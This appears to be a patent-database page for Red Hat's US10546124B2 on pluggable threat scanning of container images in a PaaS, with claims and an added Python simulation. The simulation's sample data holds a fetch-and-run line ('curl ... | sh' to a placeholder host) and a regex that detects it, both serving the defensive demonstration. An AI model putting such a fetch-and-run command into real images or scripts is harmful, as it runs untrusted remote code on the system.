Container and image scanning for a platform-as-a-service system

US10546124B2 · US · B2

Patent metadata
Publication number: US-10546124-B2
Application number: US-201816214987-A
Country: US
Kind code: B2
Filing date: Dec 10, 2018
Priority date: Jan 26, 2015
Publication date: Jan 28, 2020
Grant date: Jan 28, 2020

How to read this patent

A practical reading order for non-experts. Skip the full description unless you need deep technical detail.

  1. Title

    What the patent document calls the invention.

  2. Abstract

    A short plain-language summary of the technical disclosure.

  3. Assignees and inventors

    Who owns or filed the patent and who is credited as inventor.

  4. Key dates

    Filing, priority, publication, and grant dates set the timeline.

  5. First independent claim

    The legal scope of protection — read this for what is actually claimed.

  6. CPC / IPC classifications

    Technology tags used to group this patent with similar filings.

  7. Citations and related patents

    Prior art links and similar publications in this corpus.

Abstract

Official abstract text for this publication.

A method of container and image scanning includes receiving, by a processing device executing a node of a multi-tenant Platform-as-a-Service (PaaS) system, a pluggable scan process to scan containers of the multi-tenant PaaS system to detect patterns indicative of threats to the multi-tenant PaaS system, installing, by the processing device, the pluggable scan process at the node, scanning, by the processing device via the pluggable scan process at the node, a top layer of an application image instance used to launch a container at the node without scanning remaining layers of the application image instance, and in response to the scanning generating a clean result, terminating, by the processing device, the pluggable scan process for the container.

First claim

Opening claim text (preview).

What is claimed is:

1. A method, comprising: receiving, by a processing device executing a node of a multi-tenant Platform-as-a-Service (PaaS) system, a pluggable scan process to scan containers of the multi-tenant PaaS system to detect patterns indicative of threats to the multi-tenant PaaS system; installing, by the processing device, the pluggable scan process at the node; scanning, by the processing device via the pluggable scan process at the node, a top layer of an application image instance used to launch a container at the node without scanning remaining layers of the application image instance; and in response to the scanning generating a clean result, terminating, by the processing device, the pluggable scan process for the container.

2. The method of claim 1, wherein the application instance image to provide functionality for an application on the node.

3. The method of claim 1, wherein the scanning to detect the patterns defined by a definition file of the pluggable scan process.

4. The method of claim 3, wherein the clean result comprises no patterns detected in the top layer of the application image instance.

5. The method of claim 3, further comprising in response to the scanning detecting one of the patterns in the top layer of the application image instance, reporting a failure of the pluggable scan process to a monitoring component of the multi-tenant PaaS system in order for the monitoring component to initiate a takedown process for the container that failed the scan process.

6. The method of claim 1, further comprising performing the scanning on an entirety of an application image of the multi-tenant PaaS system in response to the application image being built at a build system of the multi-tenant PaaS system.

7. The method of claim 6, wherein information pertaining to the pluggable scan process on the entirety of the application image is reported to and maintained by a central scan data store of the multi-tenant PaaS system, and wherein the information comprises at least an identifier comprising a checksum of the application image as scanned, an identification of the pluggable scan process, a version of a definition file used by the pluggable scan process, and a result of the scanning by the pluggable scan process on the entirety of the application image.

8. The method of claim 1, further comprising performing the scanning, via the pluggable scan process, on each application image stored in an image repository of the multi-tenant PaaS system in response to a new definition file for the pluggable scan process being received at the image repository.

9. The method of claim 8, further comprising in response to the scanning of any application image in the image repository results failing, reporting a failure of the pluggable scan process on the application image to a monitoring component of the multi-tenant PaaS system in order for the monitoring component to locate containers executing any instances of the application and initiate a takedown process for the located containers.

10. A system, comprising: a memory; a processing device communicably coupled to the memory, the processing device to: execute a node of a multi-tenant Platform-as-a-Service (PaaS) system; receive a pluggable scan process to scan containers of the multi-tenant PaaS system to detect patterns indicative of threats to the multi-tenant PaaS system; install the pluggable scan process at the node; scan, via the pluggable scan process at the node, a top layer of an application image instance used to launch a container at the node without scanning remaining layers of the application image instance; and in response to the scanning generating a clean result, terminate the pluggable scan process for the container.

11. The system of claim 10, wherein the application instance image to provide functionality for an application on the node.

12. The system of claim 10, wherein the scanning to detect patterns defined by a definition file of the pluggable scan process, and wherein the clean result comprises detecting none of the patterns in the top layer of the application image instance.

13. The system of claim 12, wherein the processing device further to, in response to the scanning detecting one of the patterns in the top layer of the application image instance, report a failure of the pluggable scan process to a monitoring component of the multi-tenant PaaS system in order for the monitoring component to initiate a takedown process for the container that failed the scan process.

14. The system of claim 10, wherein the processing device further to perform the scan process on an entirety of an application image of the multi-tenant PaaS system when the application image is built at a build system of the multi-tenant PaaS system.

15. The system of claim 10, wherein the processing device further to perform the scanning, via the pluggable scan process, on each application image stored in an image repository of the multi-tenant PaaS system in response to a new definition file for the pluggable scan process being received at the image repository.

16. A non-transitory machine-readable storage medium including instructions that, when accessed by a processing device, cause the processing device to: receive, by the processing device executing a node of a multi-tenant Platform-as-a-Service (PaaS) system, a pluggable scan process to scan containers of the multi-tenant PaaS system to detect patterns indicative of threats to the multi-tenant PaaS system; install, by the processing device, the pluggable scan process at the node; scan, by the processing device via the pluggable scan process at the node, a top layer of an application image instance used to launch a container at the node without scanning remaining layers of the application image instance; and in response to the scanning generating a clean result, terminate, by the processing device, the pluggable scan process for the container.

17. The non-transitory machine-readable storage medium of claim 16, wherein the scanning to detect the patterns defined by a definition file of the pluggable scan process, and wherein the clean result comprises detecting none of the patterns in the top layer of the application image instance.

18. The non-transitory machine-readable storage medium of claim 17, wherein the processing device further to, in response to the scanning detecting one of the patterns in the top layer of the application image instance, report a failure of the scanning to a monitoring component of the multi-tenant PaaS system in order for the monitoring component to initiate a takedown process for the container that failed the scan process.

19. The non-transitory machine-readable storage medium of claim 16, wherein the processing device further to perform the scanning, via the pluggable scan process, on an entirety of an application image of the multi-tenant PaaS system in response to the application image being built at a build system of the multi-tenant PaaS system.

20. The non-transitory machine-readable storage medium of claim 16, wherein the processing device further to perform the scanning, via the pluggable scan process, on each application image stored in an image repository of the multi-tenant PaaS system in response to a new definition file for the scan process being received at the image repository.
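The claims describe three scan points that are easy to lose in the legal phrasing: a full-image scan at build time whose result (image checksum, scanner identity, definition-file version, outcome) is kept in a central scan data store (claims 6 and 7); a launch-time scan that looks only at the top layer of the image instance and either terminates quietly on a clean result or reports to a monitoring component that takes the container down (claims 1 and 5); and a repository-wide rescan whenever a new definition file arrives, with takedown of any running containers of a failing image (claims 8 and 9). The following simulation is an added example written for this page; it is not code from the patent or from Red Hat. The class and function names, the definition-file format (a version plus a tuple of regular expressions), the "layers as byte strings" image model and the constructed sample images and patterns are all assumptions made for illustration.

```python
import hashlib
import re
from dataclasses import dataclass, field


@dataclass(frozen=True)
class DefinitionFile:
    """Assumed definition-file format: a version string and regex patterns."""
    version: str
    patterns: tuple  # regular expressions matched against layer content


@dataclass(frozen=True)
class ScanPlugin:
    """The 'pluggable scan process': a scanner name plus its definition file."""
    name: str
    definitions: DefinitionFile

    def matches(self, layer: bytes) -> list:
        text = layer.decode("utf-8", errors="replace")
        return [p for p in self.definitions.patterns if re.search(p, text)]


@dataclass(frozen=True)
class Image:
    """Layered application image; layers[-1] is the top layer of an instance."""
    name: str
    layers: tuple

    def checksum(self) -> str:
        h = hashlib.sha256()
        for layer in self.layers:
            h.update(layer)
        return h.hexdigest()


@dataclass
class Monitoring:
    """Stand-in for the PaaS monitoring component; records takedowns it initiates."""
    taken_down: list = field(default_factory=list)

    def report_failure(self, container_id: str, image_name: str, hits: list) -> None:
        self.taken_down.append(container_id)


def scan_full_image(plugin, image, scan_store):
    """Build-time scan over every layer; the record goes to the central scan store."""
    hits = [p for layer in image.layers for p in plugin.matches(layer)]
    record = {
        "identifier": image.checksum(),
        "scan_process": plugin.name,
        "definition_version": plugin.definitions.version,
        "result": "failed" if hits else "clean",
    }
    scan_store.append(record)
    return record


def scan_container(plugin, image, container_id, monitoring):
    """Launch-time scan of the top layer only; a hit is reported for takedown."""
    hits = plugin.matches(image.layers[-1])
    if hits:
        monitoring.report_failure(container_id, image.name, hits)
        return "failed"
    return "clean"  # clean result: the scan process ends for this container


def rescan_repository(plugin, repository, running, monitoring, scan_store):
    """New definition file received: rescan every stored image, take down
    containers that are executing an instance of any image that now fails."""
    failed = []
    for image in repository:
        record = scan_full_image(plugin, image, scan_store)
        if record["result"] == "failed":
            failed.append(image.name)
            for container_id, image_name in running.items():
                if image_name == image.name:
                    monitoring.report_failure(container_id, image.name, [])
    return failed


# Constructed sample data (not from the patent).
BASE = b"FROM base\nRUN apt-get install -y python3\n"
CLEAN_TOP = b"COPY app.py /srv/app.py\n"
SUSPECT_TOP = b"COPY app.py /srv/app.py\nRUN curl http://placeholder.invalid/x | sh\n"
DEFS_V1 = DefinitionFile("1", (r"eval\(",))
DEFS_V2 = DefinitionFile("2", (r"eval\(", r"curl [^|]*\| *sh"))  # v2 adds a pipe-to-shell rule


def demo():
    plugin_v1 = ScanPlugin("pattern-scanner", DEFS_V1)
    store, monitoring = [], Monitoring()
    good = Image("web-good", (BASE, CLEAN_TOP))
    bad = Image("web-bad", (BASE, SUSPECT_TOP))
    for img in (good, bad):                      # build-time full scans, v1 definitions
        scan_full_image(plugin_v1, img, store)
    results = {cid: scan_container(plugin_v1, img, cid, monitoring)
               for cid, img in (("c1", good), ("c2", bad))}   # launch-time top-layer scans
    plugin_v2 = ScanPlugin("pattern-scanner", DEFS_V2)          # new definition file arrives
    running = {"c1": "web-good", "c2": "web-bad"}
    failed = rescan_repository(plugin_v2, [good, bad], running, monitoring, store)
    return results, failed, sorted(monitoring.taken_down), store


if __name__ == "__main__":
    print(demo())
```

The run shows why the repository rescan matters: with the version 1 definitions both images pass at build and launch time, and only the version 2 rescan flags `web-bad` and takes down the container already running it. The launch-time path deliberately ignores lower layers, which is what keeps it cheap but also why the build-time full scan and the stored checksum-keyed record are needed alongside it.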

Assignees

Red Hat Inc

Inventors

Classifications

  • Starting, stopping, suspending or resuming virtual machine instances · CPC title

  • Creating, deleting, cloning virtual machine instances · CPC title

  • Emulation; Interpretation; Software simulation, e.g. virtualisation or emulation of application or operating system execution engines · CPC title

  • G06F21/562 (primary) · Static detection · CPC title

  • Detecting local intrusion or implementing counter-measures · CPC title

Patent family

Related publications grouped by family.

External sources

Frequently asked questions

Answers are generated from the same data shown on this page.

What does patent US10546124B2 cover?
A method of container and image scanning includes receiving, by a processing device executing a node of a multi-tenant Platform-as-a-Service (PaaS) system, a pluggable scan process to scan containers of the multi-tenant PaaS system to detect patterns indicative of threats to the multi-tenant PaaS system, installing, by the processing device, the pluggable scan process at the node, scanning, by …
Who is the assignee on this patent?
Red Hat Inc
What technology area does this patent fall under?
Primary CPC classification G06F21/562. Mapped technology areas include Physics.
When was this patent published?
Publication date Jan 28, 2020 (B2). Legal status and post-grant events are not shown on this page.
What related patents are in patentsdb?
We list 3 related publications on this page (citations in our corpus or others sharing the same primary CPC).